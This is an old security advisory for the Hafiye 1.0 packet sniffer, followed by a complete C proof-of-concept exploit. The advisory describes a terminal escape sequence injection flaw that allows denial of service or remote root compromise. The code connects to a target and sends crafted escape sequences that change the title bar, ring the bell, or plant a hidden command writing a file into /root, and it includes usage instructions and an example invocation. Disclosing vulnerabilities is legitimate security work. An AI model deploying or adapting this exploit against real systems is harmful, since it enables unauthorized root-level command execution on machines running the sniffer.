+-------[ Software ]--------------+ Hafiye [1.0] "POSIX-compliant, customizable TCP/IP packet sniffer." +-------[ Tested Versions ]--------------+ Hafiye[1.0] Tested on:Linux(Hafiye compiled from tarball) FreeBSD 4.7 (Installed from CD) +-------[ Vulnerability ]--------------+ Packet Payload Terminal Escape Sequence Injection Vulnerability. Results: DoS/Remote Root Comprimise +-------[ Description ]--------------+ Hafiye[1.0] is a POSIX-compliant, customizable TCP/IP packet sniffer. It runs with uid0 privilege. Hafiye-1.0 doesnt filter the payload when printing it to the terminal. A malicious attacker can send packets with escape sequence payloads to exploit this vulnerability. If Hafiye has been started with -n packet count option , the vulnerability could allow remote code execution. For remote code execution the victim must press Enter after program exit. +-------[ Contact ]--------------+ http://deicide.siyahsapka.org deicide@siyahsapka.org +-------[ Proof Of Concept Exploit ]--------------+ /* Remote Exploit for Hafiye-1.0 ** Terminal Escape Sequence Injection Vulnerability ** Written by Serkan Akpolat ** Homepage: http://deicide.siyahsapka.org ** E-mail: deicide@siyahsapka.org ** Greets: Virulent, gorny and all other netricians */ #include #include #include #include #include #include #include typedef struct _target { char *host; u_short port; unsigned int sequence; unsigned int cnt; } target; char *esc_sequence[]= {"Escape Sequences", "\x1b""]2;Insecure?""\x07\x0a", "\x07\x07\x07\x07\x07\x07", "\x1b""]2;;echo Owned > /root/Owned.txt" "\x07\x1b""[21t""\x1b""]2;xterm""\x07" "Abnormal Termination""\x1b" "[8m;""\x0a"}; char use[] ="\t[ -h host ] [ -p port ] [ -e esc-seq-n ] [ -l number ]\n" "\t Escape Sequences :\n" "\t1-Change TitleBar Text to \"Insecure?\"\n" "\t2-Ring The Bell\n" "\t3-Hidden Prompt to Create Owned.txt in /root\n" "\tExample: ./exp -h 192.168.0.3 -p 80 -e 1 -l 1\n"; void usage() { printf("%s",use); exit(1); } int connect_to_host(char *host, u_short port) { int sock = 0; struct hostent *hp; struct sockaddr_in sa; memset(&sa, 0, sizeof(sa)); hp = gethostbyname(host); if (hp == NULL) { herror("Error:"); exit(1); } sa.sin_family = AF_INET; sa.sin_port = htons(port); sa.sin_addr = **((struct in_addr **) hp->h_addr_list); sock = socket(AF_INET, SOCK_STREAM, 0); if (sock < 0) exit(1); if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0) exit(1); printf("[+] Connected to %s\n", host); return sock; } int main(int argc, char **argv) { int i; int sock = 0; char buf[256]="\0"; target target; memset(&target,0,sizeof(target)); while ((i = getopt(argc, argv, "h:p:e:l:")) != -1) { switch (i) { case 'h': target.host = optarg; break; case 'p': target.port = (u_short)atoi(optarg); break; case 'e': target.sequence = atoi(optarg); if(target.sequence < 1 || target.sequence > 3) { usage(); } break; case 'l': target.cnt=atoi(optarg); if(target.cnt<1) { target.cnt=1; } break; case ':': case '?': default: usage(); exit(1); } } if (optind != argc || !target.host || !target.port || !target.sequence || !target.cnt) { usage(); } sock = connect_to_host(target.host, target.port); strncpy(buf,esc_sequence[target.sequence],sizeof(buf)-1); printf("[+] Sending Escape Sequences\n"); do { if (send(sock, buf, strlen(buf), 0) < 0) { printf("Socket Error\n"); exit(1); } target.cnt--; } while(target.cnt > 0); close(sock); return 0; }